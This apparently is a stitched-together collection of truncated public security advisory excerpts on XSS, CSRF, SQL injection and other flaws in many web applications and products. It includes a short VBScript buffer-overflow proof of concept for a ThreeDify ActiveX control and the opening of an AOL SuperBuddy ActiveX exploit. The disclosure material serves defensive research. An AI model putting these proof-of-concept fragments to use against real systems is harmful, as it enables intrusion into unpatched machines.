
HTB22970: Multiple XSS vulnerabilities in PHPDug

Reference: http://www.htbridge.ch/advisory/multiple_xss_vulnerabilities_in_phpdug.html
Product: PHPDug
Vendor: Kubelabs.com ( http://www.kubelabs.com/ ) 
Vulnerable Version: 2.0.0 and probably prior versions
Vendor Notification: 21 April 2011 
Vulnerability Type: XSS (Cross Site Scripting)
Risk level: Medium 
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) 

Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.

HTB23008: Multiple XSS & CSRF (Cross-Site Request Forgery) in miniblog

Product: miniblog
Vendor: spyka Web Group ( http://www.spyka.net ) 
Vulnerable Version: 1.0.0 and probably prior
Tested on: 1.0.0
Vendor Notification: 25 May 2011 
Vulnerability Type: XSS (Cross Site Scripting) , CSRF (Cross-Site Request Forgery)
Risk level: Medium 
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) 

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in miniblog, which can be exploited to perform cross-site scripting & cross-site request forgery attacks.

ThreeDify Designer ActiveX control multiple buffer overflow vulnerabilities

<html>
<body>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target'></object>
<script language='vbscript'>
arg1=String(3000, "A")
target.cmdExport arg1 
</script>
</body>
</html>

Kloxo LxCenter Server CP v6.1.10 - Multiple Web Vulnerabilities



Introduction:
=============
Scriptable, distributed and object oriented Hosting Platform. Manage
Clients, Resellers, Domains, Backups, Stats, Mails and Databases.
Manage everything!

(Copy of the Vendor Homepage: http://www.lxcenter.org/)


CORE-2009-0910: Autodesk Maya Script Nodes Arbitrary Command Execution

      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs/

Autodesk Maya Script Nodes Arbitrary Command Execution



1. *Advisory Information*


TwonkyMedia Server Multiple Cross-Site Scripting Vulnerabilities

===========================================================================
Title:    TwonkyMedia Server Multiple Cross-Site Scripting Vulnerabilities

Product:  TwonkyMedia Server
Vendor:   TwonkyMedia (PacketVideo Corporation), http://www.twonkymedia.com

Author:   Davide Canali

[scip_Advisory 4020] Check Point Connectra R62 Login Script Injection Vulnerability

Check Point Connectra R62 Login Script Injection Vulnerability
scip AG Vulnerability ID 4020 (09/04/2009)
http://www.scip.ch/?vuldb.4020

I. INTRODUCTION

Check Point Connectra is a so-called SSL-VPN solution, which allows
users to access a remote system using a regular web browser.

More information is available on the official product web site at the

[DSECRG-09-055] OSSIM 2.1 - Multiple security vulnerabilities

1.1 SQL injections in repository

The attacker needs to be authorized in the system for success.

Vulnerable script - repository_document.php
Vulnerable parameter - id_document

Example
*******


Cisco Security Advisory: Vulnerabilities in Unified Contact Center Express Administration Pages

Summary
=======

Cisco Unified Contact Center Express (Cisco Unified CCX) server contains
both a directory traversal vulnerability and a script injection
vulnerability in the administration pages of the Customer Response
Solutions (CRS) and Cisco Unified IP Interactive Voice Response (Cisco
Unified IP IVR) products. Exploitation of these vulnerabilities could
result in a denial of service condition, information disclosure, or a
privilege escalation attack.

[waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09

Date: 15. June 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-74.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TorrentTrader is a feature packed and highly customisable PHP/MySQL Based
BitTorrent tracker. Featuring integrated forums and plenty of administration
options. Please visit www.torrenttrader.org for the support forums.

Local vulnerability in suexec + FastCGI + PHP configurations

  Most current installations of PHP set up to run via FastCGI with suexec are vulnerable to a local exploit, where anyone with the ability to run code as the user the webserver runs as can gain access as any user with an account set up to run PHP. It is anticipated that this issue will especially affect shared web hosts who use FastCGI + suexec thinking it will give them additional security.

Conditions for exploitation:
  => PHP needs to be used via CGI or FastCGI.
  => The system must be set up to use suexec (rather than, say, having PHP run as an external FastCGI server).
  => The attacker must be able to run code as the same user that the webserver runs as. This is unlikely to be a problem for many local attackers, because there are a multitude of possible attack vectors, such as SSI, non-suexec CGI scripts, non-suexec PHP (if mod_php is also installed), and likely numerous other options.
  => Depending on the configuration, setting an open_basedir might protect an installation. However, this only applies if open_basedir is set, php-cgi is not installed directly into the web space, but is instead called from a script which doesn't pass any parameters from the script command line.

Affected PHP versions:
  => All versions of PHP (including PHP 5.2.8 and latest CVS) in existence at the date of this advisory are believed to be affected.


pPIM Multiple Vulnerabilities

Version Tested:  pPIM 1.0
Vendor notified
Full details can also be found at http://www.lampsecurity.org/node/18
Author: Justin C. Klein Keane <justin@madirish.net>

Description

pPIM (http://www.phlatline.org/index.php?page=prod-ppim) is a Personal
Information Management application written in PHP that can store
contacts (including their photos), events, links, notes, send and check
email, and upload files.  pPIM came to my attention recently with the

Re: function sleep() in all versions of PHP

[http://www.terena.org/activities/tf-csirt/iodef/docs/i-taxonomy_terms.html]

In this case a security policy has been designated with the
"max_execution_time" directive and that policy is being violated by
the blocking code. As you say there are ways around this, (kill
script, resource limiting, etc..) however there can be similar
mitigating circumstances in any situation where you have a
vulnerability (firewall, executable stack protection, etc..).

As with any vulnerability it is the vendor's responsibility to provide
a fix and protect its users. Many web developers or administrators

GWExtranet Script Injections & Privilege Escalation Vulnerability

[HSC] GWExtranet Script Injections & Privilege Escalation Vulnerability

Attackers may exploit this issue via a web client. An attacker may leverage this 
issue to have arbitrary script code execute in the browser of an unsuspecting user 
in the context of the affected site. This may help the attacker steal cookie-based 
authentication credentials and launch other attacks. A successful exploit could 
allow an attacker to compromise the application by defacing it through malicious code injection.




RE: [Full-disclosure] SecNiche : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability

No offence intended, but if you take a little more effort in validating your
work before posting publicly then you can save yourself from embarrassment. 

I don't see anything in the script that can bypass zone security and run
successfully from the internet zone. I am sure you have tested it locally and
drawn the conclusion that the script can execute from the internet zone. To test the
script from the internet zone, you need to upload it to a webserver and try
accessing it via the browser. 

Any VB/Java script will run from local security with a charm but if you can

[waraxe-2010-SA#078] - Multiple Vulnerabilities in CruxCMS 3.0.0

###############################################################################
1. Unauthorized password reset in "manager/passwordreset.php"
###############################################################################

Reason: directly accessible php script
Attack vectors: user submitted POST parameters "ID" and "Password"
Preconditions: none
Impact: attacker can take over CruxCMS admin account

Php script "manager/passwordreset.php" is directly accessible via web

Windows SMB NTLM Authentication Weak Nonce Vulnerability

(to get the scripts mentioned by this advisory please get the full
version at http://www.hexale.org/advisories/OCHOA-2010-0209.txt; I did
not include them here to reduce the size of this email)


                Windows SMB NTLM Authentication Weak Nonce Vulnerability
                                Security Advisory
        Hernan Ochoa (hernan@gmail.com) - Agustin Azubel (agustin.azubel@gmail.com)



[scip-Advisory 4063] PasswordManager Pro 6.1 Script Injection Vulnerability

PasswordManager Pro 6.1 Script Injection Vulnerability
scip AG Vulnerability ID 4063 (12/15/2009)
http://www.scip.ch/?vuldb.4063


I. INTRODUCTION

"Password Manager Pro is a secure vault for storing and managing shared
sensitive information such as passwords, documents and digital
identities of enterprises."        

[DSECRG-09-062] Alteon OS BBI (Nortell) - Multiple Vulnerabilities

Date of Public Advisory: 16.11.2009 
Solution:                YES (Non official)
Author:                  Sintsov Alexey from Digital Security Research Group [DSecRG]


Description
***********

Browser-Based Interface (BBI) software is included in the Nortel Networks (versions < 25.0.0.0) and Radware
family of switches. The BBI software lets you use your Web browser to access switch
information and statistics, and to perform switch configuration via the Internet. This

Secunia Research: AproxEngine Multiple Vulnerabilities

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8

CVE-2009-4505 OpenCMS OAMP Comments Module XSS

#######################################################################
#
# CVE ID : CVE-2009-4505
# Product: OpenCMS OAMP Comments Module
# Vendor:  Open Source, Alkacon GmbH (Cologne, Germany)
# Subject: Cross-site scripting (XSS)
# Risk:    High
# Effect:  Anonymously exploitable
# Author:  Cyrill Brunschwiler (cyrill.brunschwiler@csnc.ch)
# Date:    March 24th 2010
#

AOL 9.1 SuperBuddy ActiveX Control SetSuperBuddy() remote code execution exploit

CLSID: {189504B8-50D1-4AA8-B4D6-95C8F58A6414}
Progid: Sb.SuperBuddy.1
Binary Path: C:\Programmi\AOL 9.1\sb.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
-->
<script language='vbscript'>
Set obj = CreateObject("Sb.SuperBuddy.1")
</script>
<script language='javascript'>

Re: DoS vulnerability in Google Chrome

Thanks. I'm glad that my blocking DoS and DoS via resource consumption
exploits gave you inspiration to find a new way to attack Firefox and IE7 ;-).

> Internet Explorer 7 version: 7.0.5730.13 will by the way consume up to 70%
> of the CPU if the same script is run.

MaXe, it's a resource consumption DoS, which is described in my above-mentioned
Classification of DoS vulnerabilities in browsers. So if 70% or higher (up to
100%) of CPU resources is used, it's already a resource consumption DoS.


Survey: "MIME/Content-Type-Sniffing" Issues in Image Uploads in Forum Scripts

Survey: "MIME/Content-Type-Sniffing" Issues in Image Uploads in Forum Scripts
Author: Jacques Copeau

Abstract
====================================================
Internet Explorer, especially versions 7 and 6, can be tricked into treating images
as HTML, opening XSS vulnerabilities in software that allows uploads.
In a survey, we found myBB, fluxBB, phorum, SMF and WBB to be vulnerable to
such attacks.


Novell Netstorage Multiple Vulnerabilities

- Novell Netstorage Multiple Vulnerabilities

- Description

"Novell NetStorage acts as a bridge between a company's protected Novell network
and the Internet, providing protected file access from any Internet location.
Files and folders on a Novell NetWare® 6.5 server or Novell Open Enterprise
Server can be accessed using either a browser or via Network Neighborhood and Microsoft Web

[ECHO_ADV_89$2008] Softbiz Web Host Directory Script (search_result.php host_id) Blind Sql Injection Vulnerability

ECHO_ADV_89$2008

-----------------------------------------------------------------------------------------
[ECHO_ADV_89$2008] Softbiz Web Host Directory Script (search_result.php host_id) Blind Sql Injection Vulnerability
-----------------------------------------------------------------------------------------

Author         : M.Hasran Addahroni
Date           : April 28th, 2007
Location       : Jakarta, Indonesia
Web            : http://advisories.echo.or.id/adv/adv89-K-159-2008.txt

[DSECRG-08-017] Flyspray 0.9.9.4 Multiple Security Vulnerabilities

Date of Public Advisory:        03.03.2008
Author:                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

Flyspray system has multiple security vulnerabilities:

1. SiXSS in POST

CORE-2008-0124: Multiple vulnerabilities in Google's Android SDK

Bugtraq ID: 28006, 28005        
CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,
CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269      


*Vulnerability Description*

Android is a project promoted primarily by Google through the Open Handset
Alliance aimed at providing a complete set of software for mobile
devices: an operating system, middleware and key mobile applications
[1]. Although the project is currently in a development phase and has

HTB22913: Multiple CSRF (Cross-Site Request Forgery) in UseBB

Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to a failure in the "/panel.php" script to properly verify the source of the HTTP request.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, or disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability. The following PoC is available:


[DSECRG-08-013] Modx 0.9.6.1, 0.9.6.1p1 Multiple Security Vulnerabilities

Authors:                        Alexandr Polyakov, Stas Svistunovich
                                Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

MODx system has multiple security vulnerabilities:

1. Linked XSS
